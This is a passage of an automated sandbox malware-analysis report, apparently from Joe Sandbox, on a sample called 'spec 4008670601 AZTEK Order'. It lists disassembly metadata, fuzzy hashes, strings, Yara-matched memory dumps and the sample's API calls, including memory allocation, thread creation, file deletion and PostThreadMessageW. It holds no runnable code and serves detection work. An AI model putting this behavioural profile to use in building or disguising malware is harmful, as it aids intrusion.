                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018102BD
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018102E7
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                      • Instruction ID: e3e343046a924aa3b60de1bb6b10601b9353a372f1a57e35a2a5bc4bbf46d1a4
                                                      • Opcode Fuzzy Hash: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                      • Instruction Fuzzy Hash: 42E1BE316047419FD726CF28C884B6AFBE5BB88B14F140A6DF5A5CB2E1D774DA84CB42
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 01817BAC
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01817B7F
                                                      • RTL: Resource at %p, xrefs: 01817B8E
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                      • Instruction ID: 0c44c4e4401baebd21901e1e060307798cb64001b3176ca05d04c2b1631c635e
                                                      • Opcode Fuzzy Hash: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                      • Instruction Fuzzy Hash: F541E3313047069FDB21DE29C840B6AF7F5EF9A720F100A6DFA5AD7280DB31E5458B91
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0181728C
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 018172C1
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01817294
                                                      • RTL: Resource at %p, xrefs: 018172A3
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                      • Instruction ID: c56a07a522e8e8623b692b004a18d2d4df4dfdb996fda41b1463ec5fa351dc4b
                                                      • Opcode Fuzzy Hash: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                      • Instruction Fuzzy Hash: 6941F032600206ABDB21DE29CC41FA6F7B9FB99710F24061DFA56EB240DB20E942C7D1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                      • Instruction ID: fce7c2ad759cbcab1371941371187a9fa2a4f8b2db4846993e0435e5ebae4259
                                                      • Opcode Fuzzy Hash: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                      • Instruction Fuzzy Hash: D8318772A00119DFDB60DE2DDC44BEEB7F9EB44710F440559ED49D3201EF309A488B60
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: c8b77c1f8d1381a3d17b5fb2968951b1e143b6e20e17d43ae3621f895eeb25da
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: 9791A271E002169BEB28DF6DC889ABEFBE5FF4C320F54451AE955E72C4E73089818791
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                      • Instruction ID: 7e5972e44cdd7518fcaa101ebe1deca91af4f53c9fa707221903119987c2c69d
                                                      • Opcode Fuzzy Hash: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                      • Instruction Fuzzy Hash: E6812D71D012699BDB76CF54CC49BEEB7B4AB48714F0041EAEA19B7280E7705E84CFA0
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0182CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Cw@4Cw
                                                      • API String ID: 4062629308-3101775584
                                                      • Opcode ID: f7365cf8e393549de62544ca6cdc6b3abbf59e6e5c413323020f5c336eeaf64b
                                                      • Instruction ID: 084a9f5174b8fc094d1b162a9402e10e031d6a62d059cca4c1b5fed9c858603a
                                                      • Opcode Fuzzy Hash: f7365cf8e393549de62544ca6cdc6b3abbf59e6e5c413323020f5c336eeaf64b
                                                      • Instruction Fuzzy Hash: E941B271900229DFCB229FA9C884AAEFBF8FF54740F14412AE915DB264D774DA41CB61

                                                      Execution Graph

                                                      Execution Coverage:2.4%
                                                      Dynamic/Decrypted Code Coverage:4.2%
                                                      Signature Coverage:2.2%
                                                      Total number of Nodes:453
                                                      Total number of Limit Nodes:73

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ![$&$($1$67$9$:$:$;q$=q$A$A$BM$Be$C$E&$J$JN\$K.$N$O$Q$Q$Qz$R$V~E&$X$Y$Z$\$b$d$f$j$m`$u$uC$uP$y9$0$^$l$}y9
                                                      • API String ID: 0-1953769178
                                                      • Opcode ID: 63031c361e1967507541be4260cf6cd07389f5aaaabdd8b1647713a05a3d2458
                                                      • Instruction ID: 43ba425280bb8bc668c47b2906945e46819e50a07f27ebac5c0d177becbc8929
                                                      • Opcode Fuzzy Hash: 63031c361e1967507541be4260cf6cd07389f5aaaabdd8b1647713a05a3d2458
                                                      • Instruction Fuzzy Hash: F062B2B0D0522ACBEB28CF44C994BEDBBB2BB44308F2081D9C5596B384D7B95E85DF54
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 02DDC254
                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02DDC28F
                                                      • FindClose.KERNELBASE(?), ref: 02DDC29A
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 21694489ce0a3650d5eaaae87c9f93644fc126f3e044ba9d29fa2387bb1c1b49
                                                      • Instruction ID: 6efba64b91cc942631293e958d1dbe85451f1b80bc7325f99e364e0a8e0e5427
                                                      • Opcode Fuzzy Hash: 21694489ce0a3650d5eaaae87c9f93644fc126f3e044ba9d29fa2387bb1c1b49
                                                      • Instruction Fuzzy Hash: 4D3152719007497BDB60EBA0CC85FEF777DDF44B08F148559B909A7280EA70AE84DBA0
                                                      APIs
                                                      • NtCreateFile.NTDLL(?,?,?,?,00000036,?,?,?,?,?,?), ref: 02DE80FA
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 079124ef3477967559f5727808a8982cd5504fe3d61613fd0eea355095ec3f31
                                                      • Instruction ID: 79247b1a82b11c940c4fbb68b572aafc6fa2d91e10da971f20429b6d69053dbc
                                                      • Opcode Fuzzy Hash: 079124ef3477967559f5727808a8982cd5504fe3d61613fd0eea355095ec3f31
                                                      • Instruction Fuzzy Hash: 1C31D0B5A01209AFDB54DF99D880EDEBBB9EF8C304F108219F919A7340D770A851CFA5
                                                      APIs
                                                      • NtReadFile.NTDLL(?,?,?,?,00000036,?,?,?,?), ref: 02DE8242
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 62d9692a72f8b1308e095212dea9c2c55fc95751e8724d1e63c09cc4a6b2651c
                                                      • Instruction ID: c9ecb9860d7d35c4d9ab9aa9564f6a452405594964f3972cc11babcc34de430b
                                                      • Opcode Fuzzy Hash: 62d9692a72f8b1308e095212dea9c2c55fc95751e8724d1e63c09cc4a6b2651c
                                                      • Instruction Fuzzy Hash: 4131C8B5A00609AFDB24DF99D880EDEB7B9EF88314F118209F919A7340D770A911CFA1
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(02DD1CFE,?,02DE70E7,00000000,00000004,00003000,?,?,?,?,?,02DE70E7,02DD1CFE,02DE70E7,50FFFD9F,02DD1CFE), ref: 02DE84E4
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: fb478c230df1748140ca80267227f12761ee9c0927a232a7eff3a1499e660764
                                                      • Instruction ID: a61dd250fa92019b0edec833dc1e78c1e31f65313039dee4cf7d451f4919fc95
                                                      • Opcode Fuzzy Hash: fb478c230df1748140ca80267227f12761ee9c0927a232a7eff3a1499e660764
                                                      • Instruction Fuzzy Hash: D821ECB5A00649AFDB24EF99DC41EEF77B9EF88704F108509F919A7380D774A811CBA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: e46a643d9d9823aea0ae1bd062fa72092a5539ba38b6ab707a48acb0fb379cff
                                                      • Instruction ID: bc16b41c735468f5fba5d90ea2a6ccd94cf3ba5f1f9f2e33d1385e81aa24ae21
                                                      • Opcode Fuzzy Hash: e46a643d9d9823aea0ae1bd062fa72092a5539ba38b6ab707a48acb0fb379cff
                                                      • Instruction Fuzzy Hash: CD016172A012147FE620EA94DC01FEB77ADEB85714F104109FA59AB281D7B1BD04CBF5
                                                      APIs
                                                      • NtClose.NTDLL(?,02DD33AC,001F0001,?,00000000,?,?,00000104), ref: 02DE8311
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                      • Instruction ID: 9d3b5453b0b66c794585bf3946df9a2d7781451a58a705b374abad489013e0aa
                                                      • Opcode Fuzzy Hash: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                      • Instruction Fuzzy Hash: 21E046362012147BC620BA5ACC41FDB776DDBC5724F504019FA09A7281C671B9188AF0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4d48d359cca14b761aa8a313c0d4b30e4099f5ce6bf7c6f95b1e2c2457c0d4a1
                                                      • Instruction ID: 1b79f5e2aa4953fd8bf6e7ae066b1a2626997d7e11f476d25ea49d14c7e7f42d
                                                      • Opcode Fuzzy Hash: 4d48d359cca14b761aa8a313c0d4b30e4099f5ce6bf7c6f95b1e2c2457c0d4a1
                                                      • Instruction Fuzzy Hash: 8890023170580423A144B15848C4546400597E0301B55C021F4424564C8B548A565762
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 665e29e65c64cf3f0104bd6cd537cde27c02de8bb1750c63ee5c34156ed91778
                                                      • Instruction ID: 4469632f491d627de23bc249e1bc536b63e926860d869bede31f9c029e97a181
                                                      • Opcode Fuzzy Hash: 665e29e65c64cf3f0104bd6cd537cde27c02de8bb1750c63ee5c34156ed91778
                                                      • Instruction Fuzzy Hash: 36900471701504535144F15C4C444077005D7F13013D5C135F4554570CC75CCD55D77F
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ed209c407c0d143e07251063299daad6c7540abea7eb7ace42cdae3d45e25250
                                                      • Instruction ID: 60ea888740c0ac132ac7585716b504dcb066e72d5ee185392eb3da3fdd0c569e
                                                      • Opcode Fuzzy Hash: ed209c407c0d143e07251063299daad6c7540abea7eb7ace42cdae3d45e25250
                                                      • Instruction Fuzzy Hash: A5900261302404135109B1584454616400A87E0201B55C031F50145A0DC66589916526
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 609913ef5e641a4f7096b23b4d45594655962d2b668254cee6ffcfeaeef1b9be
                                                      • Instruction ID: e7ac824455472fcb2648fd65a0fc5cf09163cbc8742c1dd69a88660906729898
                                                      • Opcode Fuzzy Hash: 609913ef5e641a4f7096b23b4d45594655962d2b668254cee6ffcfeaeef1b9be
                                                      • Instruction Fuzzy Hash: 9490023130140C13E184B158444464A000587D1301F95C025B4025664DCB558B597BA2
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e2db9ff1351b97bf1192e06c27ea7e5b651fb764d67acfe24f3002162103ae03
                                                      • Instruction ID: 367b578c83d11ff82864731835a43d7ac316ebaece229524dd0fbf62885007f6
                                                      • Opcode Fuzzy Hash: e2db9ff1351b97bf1192e06c27ea7e5b651fb764d67acfe24f3002162103ae03
                                                      • Instruction Fuzzy Hash: 0290023130544C53E144B1584444A46001587D0305F55C021B40646A4D97658E55BA62
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b20d91b5f279d287a11307c263391ddc6ba6bb4dfff54e2ca9a299d5268c051c
                                                      • Instruction ID: f9e7849ed393ff34608249ed0898b727af17facac6e8e6eecf79aae3df960e9a
                                                      • Opcode Fuzzy Hash: b20d91b5f279d287a11307c263391ddc6ba6bb4dfff54e2ca9a299d5268c051c
                                                      • Instruction Fuzzy Hash: CC90023170540C13E154B1584454746000587D0301F55C021B4024664D87958B557AA2
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 32388ad307a144ada0fb12518a1c3f42af6953f95cf212101709a36158adc984
                                                      • Instruction ID: f88a32e1e05be0b344048598a3dcdc439c1a8eb45f29f5f71f1aa1933d3792d4
                                                      • Opcode Fuzzy Hash: 32388ad307a144ada0fb12518a1c3f42af6953f95cf212101709a36158adc984
                                                      • Instruction Fuzzy Hash: 76900225321404131149F558064450B044597D6351395C025F54165A0CC76189655722
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2efd2da6243a2918c448cf082f634dcd63a114a39f58a8feba003e3f0c55eecb
                                                      • Instruction ID: 2cccec519a5300d7a3fe56dec07a4c4f11266dd4e83636c411b1e04f20706f31
                                                      • Opcode Fuzzy Hash: 2efd2da6243a2918c448cf082f634dcd63a114a39f58a8feba003e3f0c55eecb
                                                      • Instruction Fuzzy Hash: 5090043531140413110DF55C07445070047C7D5351355C031F5015570CD771CD715533
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e79a1d93dce3cc4509f589ccc7c0d270e4eb73e99cca77ca4d753fb195b12ef9
                                                      • Instruction ID: 0a7109f5c6885c6e94475ce2dd10386ae8ca9bd18bfe56b73ced346a65d945e6
                                                      • Opcode Fuzzy Hash: e79a1d93dce3cc4509f589ccc7c0d270e4eb73e99cca77ca4d753fb195b12ef9
                                                      • Instruction Fuzzy Hash: 9990026134140853E104B1584454B060005C7E1301F55C025F5064564D8759CD526527

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02DC96D5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID: ![$&$($1$67$9$:$:$;q$=q$A$A$BM$Be$C$E&$J$J$K.$N$O$Q$Q$Qz$R$V~$X$Y$Z$\$b$d$f$j$m`$u$uC$y9$0$^$l$}
                                                      • API String ID: 2422867632-1566399811
                                                      • Opcode ID: b44b7bc89731ce96443ab5f8618f6722dc515995a559009f0b43fe51199da31e
                                                      • Instruction ID: ed4879de83361c0042bc115ff0c44bb4d3dc00420099f721223da300e8709ca9
                                                      • Opcode Fuzzy Hash: b44b7bc89731ce96443ab5f8618f6722dc515995a559009f0b43fe51199da31e
                                                      • Instruction Fuzzy Hash: 54C157B0905369DBEB608F41C9587DEBAB1BB05308F2081C9D55C3B281CBFA1A89CF95

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 02DD0E1D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: N77o9w1836$N77o9w1836
                                                      • API String ID: 1836367815-4204696664
                                                      • Opcode ID: 859bbb75967b6eb1d95fc84c509627164c9037ab0481433feb5e05c666f5a0a7
                                                      • Instruction ID: cc6b1cb01a1a03073d7e6f2a726a2d0e2f624e954ec336f32b057fcefd65be0c
                                                      • Opcode Fuzzy Hash: 859bbb75967b6eb1d95fc84c509627164c9037ab0481433feb5e05c666f5a0a7
                                                      • Instruction Fuzzy Hash: 08019271D41259B6EB21ABA18C42FDF7B7C9F81B50F148055FA047B380D6B8AA06CBF5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      APIs
                                                      • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 02DD0E1D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: N77o9w1836$N77o9w1836
                                                      • API String ID: 1836367815-4204696664
                                                      • Opcode ID: add80484a598dd52526d25cfb2fed4bfe38904d1accfc7ff773322919351b675
                                                      • Instruction ID: cc6b1cb01a1a03073d7e6f2a726a2d0e2f624e954ec336f32b057fcefd65be0c
                                                      • Opcode Fuzzy Hash: add80484a598dd52526d25cfb2fed4bfe38904d1accfc7ff773322919351b675
                                                      • Instruction Fuzzy Hash: 08019271D41259B6EB21ABA18C42FDF7B7C9F81B50F148055FA047B380D6B8AA06CBF5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 718 2dd0d86-2dd0d8d 719 2dd0d8f-2dd0d97 718->719 720 2dd0dce-2dd0dd1 718->720 721 2dd0dd7-2dd0e0e call 2dc1410 call 2de15d0 720->721 722 2dd0dd2 call 2dd4770 720->722 727 2dd0e30-2dd0e35 721->727 728 2dd0e10-2dd0e21 PostThreadMessageW 721->728 722->721 728->727 729 2dd0e23-2dd0e2d 728->729 729->727
                                                      APIs
                                                      • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 02DD0E1D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
